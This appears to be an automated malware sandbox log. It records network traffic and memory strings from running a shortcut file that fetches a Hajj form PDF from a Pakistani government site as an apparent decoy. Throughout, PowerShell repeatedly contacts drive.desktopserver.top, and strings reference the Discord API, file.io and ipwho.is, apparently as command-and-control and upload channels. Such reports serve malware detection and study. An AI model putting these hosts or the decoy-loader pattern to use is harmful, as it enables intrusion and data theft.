                  Source: global trafficHTTP traffic detected: GET /SiteImage/Misc/files/HajjForm2024.pdf HTTP/1.1Host: mora.gov.pkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: mora.gov.pkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cookiesession1=678B2917984A004EC914ADEBDA66AEC6
                  Source: global trafficHTTP traffic detected: GET /SiteImage/Misc/files/HajjForm2024.pdf HTTP/1.1Host: mora.gov.pkConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cookiesession1=678B2917984A004EC914ADEBDA66AEC6
                  Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: mora.gov.pkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cookiesession1=678B2917984A004EC914ADEBDA66AEC6
                  Source: global trafficHTTP traffic detected: GET /file/res/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: drive.desktopserver.topConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: 6pu1vC0lzYj5eQLGnNvoqQ==Sec-WebSocket-Version: 13Host: gateway.discord.gg
                  Source: global trafficHTTP traffic detected: GET /file/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: drive.desktopserver.topConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /file/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: drive.desktopserver.topConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /file/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: drive.desktopserver.topConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=A3DFWFen5CsLoTP&MD=7SevKY14 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                  Source: global trafficHTTP traffic detected: GET /file/res/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: drive.desktopserver.topConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /file/res/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: drive.desktopserver.topConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /file/res/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: drive.desktopserver.topConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: VaAdp+t3Wysgbc0tpZhxww==Sec-WebSocket-Version: 13Host: gateway.discord.gg
                  Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: 0Q22eY78naCzrGK6GlNJOg==Sec-WebSocket-Version: 13Host: gateway.discord.gg
                  Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: /n44b8H3mJDvHC1mW4m8Dw==Sec-WebSocket-Version: 13Host: gateway.discord.gg
                  Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=A3DFWFen5CsLoTP&MD=7SevKY14 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                  Source: global trafficHTTP traffic detected: GET /file/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: drive.desktopserver.topConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /file/res/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: drive.desktopserver.topConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /file/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: drive.desktopserver.topConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /file/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: drive.desktopserver.topConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /file/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: drive.desktopserver.topConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /file/res/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: drive.desktopserver.topConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /file/res/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: drive.desktopserver.topConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /file/res/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: drive.desktopserver.topConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: drive.desktopserver.top
                  Source: global trafficDNS traffic detected: DNS query: mora.gov.pk
                  Source: global trafficDNS traffic detected: DNS query: www.google.com
                  Source: global trafficDNS traffic detected: DNS query: gateway.discord.gg
                  Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 16:58:23 GMTContent-Length: 0Connection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b6Gh1pMgRQAAMy6lbfJ%2BSf0D2Br3IrF94zbHTf1VYUbviU0c4wvIVtaUko8U%2BBR6%2BGg2Hr6zSWwNRCX5HRf4R6XZ0AUfpC6QLsWESJVNjUf8D50PjPeyC2Kxj%2BhCEPaD6Bv22A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 8cb5c1e8ac47424c-EWR
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 16:58:38 GMTContent-Length: 0Connection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ZHeb7pDkpH1fiIVRj%2BKGU%2BVg5dJRnzi%2BnE1a6vpb9XOPOVjJJ2YBulM3mZBve37sYpcby43ew8wgofdWOZA3Gp63gAJKgZcburTND03bQ%2FKYqXFMDfHMghjwjj8R6rGGR0%2F1A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 8cb5c2468f614345-EWR
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 16:58:38 GMTContent-Length: 0Connection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mDZ7xFkzKQlaWaLbgMM%2Bfh3pupGBYATsP3dVEUTgdUoVi8M7KK2Fcw58glScUCH2uoywzGD7822AFgI3QlnUw3yR0vX7O%2BvwDVXkUjlQJ0y7Wx6ZOERrVc9SD4pZbAmSGgUexA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 8cb5c246aee54399-EWR
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 16:58:39 GMTContent-Length: 0Connection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vfTvT42tp2SkdBdstqrbHV0Oojkqdg5IBu7Iu9JfehWHf9nGdTkabmU5ekW6%2BmDL9g5lh6cearc7ij3TJojQpdsV9dYGhJvd%2Fwk22VqbsaAndl0P8x1UzTs5s%2BbH8pu8kfaogA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 8cb5c249ef8542fc-EWR
                  Source: svchost.exe, 00000004.00000002.3381154343.0000022298E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: powershell.exe, 00000016.00000002.2485510234.0000023344CE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF4C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F30907D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.deskt
                  Source: schtasks.exe, 0000000C.00000002.2230362976.00000276C5598000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344FE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF4C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F30936E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.deskto
                  Source: powershell.exe, 00000016.00000002.2485510234.0000023344FEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF4C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F30936E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.desktopseX
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD48B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.000002334505E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344FEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.000002334447A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.000002334507A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF889000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF4C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAECA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF8A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F309408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F3093EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F30936E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.desktopserver.top
                  Source: ConDrv.22.drString found in binary or memory: http://drive.desktopserver.top/file/
                  Source: powershell.exe, 00000018.00000002.2437118491.000001F308809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F30907D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F30936E000.00000004.00000800.00020000.00000000.sdmp, ConDrv.11.dr, ConDrv.24.dr, ConDrv.23.dr, ConDrv.22.drString found in binary or memory: http://drive.desktopserver.top/file/res/
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD48B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.desktopserver.top/file/res/0
                  Source: powershell.exe, 00000016.00000002.2485510234.0000023344FE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF4C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F30936E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.desktopserver.top/file/res/X
                  Source: svchost.exe, 00000004.00000002.3381554051.0000022298ED0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: svchost.exe, 00000004.00000002.3380353643.0000022294102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3381342313.0000022298E64000.00000004.00000020.00020000.00000000.sdmp, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/go
                  Source: svchost.exe, 00000004.00000002.3381342313.0000022298E64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0
                  Source: svchost.exe, 00000004.00000002.3381432408.0000022298EB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80fs/windows/config.jsondiskVolume3
                  Source: edb.log.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD4CC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344820000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF050000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gateway.discord.gg
                  Source: powershell.exe, 0000000B.00000002.2346293232.0000019FE4678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD48B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2318160174.0000019FD593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD45E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAE9D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD48B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2318160174.0000019FD593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000016.00000002.2477439249.00000233425E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                  Source: powershell.exe, 00000017.00000002.2476908618.000001CCACF65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cok
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD45E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAE9D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 0000000B.00000002.2346293232.0000019FE4678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000B.00000002.2346293232.0000019FE4678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000B.00000002.2346293232.0000019FE4678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000018.00000002.2437118491.000001F308B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/channels/
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD4CAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2318160174.0000019FD4C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344810000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF043000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAEFB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308BA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/guilds/
                  Source: powershell.exe, 00000016.00000002.2485510234.0000023345068000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.desktopsX
                  Source: powershell.exe, 00000018.00000002.2437118491.000001F3093F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.desktopsXH
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD4A53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023345068000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAEDEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF894000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F3093F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.desktopserver.top
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD4A84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2318160174.0000019FD4A53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.000002334505E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023345068000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.00000233445BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF889000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAEDEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF894000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F30894A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F3093F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F3093EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.desktopserver.top/file/res/
                  Source: powershell.exe, 00000018.00000002.2437118491.000001F30894A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.desktopserver.topp
                  Source: powershell.exe, 00000016.00000002.2485510234.00000233445BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.desktopserver.toppz8B3
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD4CAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2318160174.0000019FD4C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344810000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF043000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAEFB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308BA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://file.io/
                  Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                  Source: svchost.exe, 00000004.00000003.2166204153.0000022298CA0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD4CC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344820000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF050000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gateway.discord.gg
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD4CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gateway.discord.gg0
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD4CC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344820000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF050000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308BB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gateway.discord.gg:443/?v=9&encording=json
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD48B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2318160174.0000019FD593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD4CAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2318160174.0000019FD4C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2485510234.0000023344810000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAF043000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2478859438.000001CCAEFB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308BA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2437118491.000001F308B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipwho.is/
                  Source: Sv6eQZzG0Z.lnkString found in binary or memory: https://mora.gov.pk/SiteImage/Misc/files/HajjForm2024.pdf;
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD61FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2346293232.0000019FE4678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: qmgr.db.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                  Source: powershell.exe, 0000000B.00000002.2318160174.0000019FD593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
